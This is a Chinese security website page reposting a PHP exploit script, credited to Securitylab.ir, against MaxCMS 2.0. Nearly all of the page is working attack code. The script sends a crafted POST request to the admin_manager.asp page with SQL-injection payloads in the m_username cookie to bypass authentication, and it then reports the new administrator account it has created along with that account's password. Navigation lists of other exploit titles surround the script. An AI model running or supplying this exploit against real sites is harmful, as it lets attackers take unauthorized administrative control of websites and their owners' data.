首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 MaxCMS 2.0 (m_username) Arbitrary Create Admin Exploit 来源：Securitylab.ir 作者：Securitylab 发布时间：2009-05-14   <?php print_r(' +---------------------------------------------------------------------------+ maxcms2.0 creat new admin exploit by Securitylab.ir +---------------------------------------------------------------------------+ '); if ($argc < 3) {     print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host:      target server (ip/hostname) path:      path to maxcms Example: php '.$argv[0].' localhost /maxcms2/ +---------------------------------------------------------------------------+ ');     exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $name = rand(1,10000); $cmd = 'm_username=securitylab'.$name.'&m_pwd=securitylab&m_pwd2=securitylab&m_level=0'; $resp = send($cmd); if (!eregi('alert',$resp)) {echo"[~]bad!,exploit failed";exit;} print_r(' +---------------------------------------------------------------------------+ [+]cool,exploit seccuss [+]you have add a new adminuser securitylab'.$name.'/securitylab +---------------------------------------------------------------------------+ '); function send($cmd) {     global $host, $path;     $message = "POST ".$path."admin/admin_manager.asp?action=add HTTP/1.1\r\n";     $message .= "Accept: */*\r\n";     $message .= "Referer: http://$host$path\r\n";     $message .= "Accept-Language: zh-cn\r\n";     $message .= "Content-Type: application/x-www-form-urlencoded\r\n";     $message .= "User-Agent: securitylab\r\n";     $message .= "X-Forwarded-For:1.1.1.1\r\n";     $message .= "Host: $host\r\n";     $message .= "Content-Length: ".strlen($cmd)."\r\n";     $message .= "Cookie: m_username=securitylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin; m_level=0; checksecuritylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=cf144fd7a325d1088456838f524ae9d7\r\n";     $message .= "Connection: Close\r\n\r\n";     $message .= $cmd;     echo $message;     $fp = fsockopen($host, 80);     fputs($fp, $message);     $resp = '';     while ($fp && !feof($fp))     $resp .= fread($fp, 1024);     echo $resp;     return $resp; } ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Family Connections CMS <= 1.9 ·Linux Kernel 2.6.x ptrace_atta ·Pinnacle Studio 12 (.hfz) Dire ·DigiMode Maya 1.0.2 (.m3u / .m ·ipsec-tools racoon frag-isakmp ·Linux Kernel 2.6.29 ptrace_att ·Java SE Runtime Environment - ·StrawBerry 1.1.1 LFI / Remote ·(POST var 'rating') BLIND SQL ·2daybiz Business Community Scr ·Bitweaver <= 2.6 /boards/board ·2daybiz Template Monster Clone   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved